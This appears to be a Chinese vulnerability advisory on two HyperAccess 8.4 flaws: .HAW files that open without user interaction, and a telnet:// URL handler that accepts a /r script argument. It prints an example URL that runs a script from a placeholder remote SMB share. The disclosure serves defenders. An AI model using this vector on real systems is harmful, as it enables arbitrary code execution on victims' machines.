Hyper Access多个远程安全漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

yperACCESS是HyperTerminal的官方升级,可为用户提供终端通讯解决方案。 HyperAccess中存在两个安全漏洞: * 通过打开.HAW文件执行命令 * HyperAccess将会话保存为.haw文件,可通过注册表中设置的editflags未经用户交互便打开这些扩展名: HKEY_CLASSES_ROOT\HAWin32\EditFlags. 如果Internet Explorer用户浏览了包含有.HAW的站点,就会强制执行自动下载并由所安装的HyperAccess打开并解析文件。 * 通过Telnet URL协议执行命令 * HyperAccess可通过将以下注册表项: HKEY_CLASSES_ROOT\telnet\shell\open\command 设置为: c:\program files\hawin32\hawin32.exe /t %1 以要求URL协议处理telnet:// URL控制程序。HyperAccess会接受/r为命令行参数指定将要运行的脚本文件,可使用类似于以下的URL通过Internet Explorer将该命令传送给URL: telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt 如果SERVER为包含有恶意脚本的SMB共享或WEBDAV Web共享的话,就会导致执行任意vbscript代码。 Hilgraeve, Inc. Hyper Access 8.4

0%
暂无可用Exp或PoC
当前有0条受影响产品信息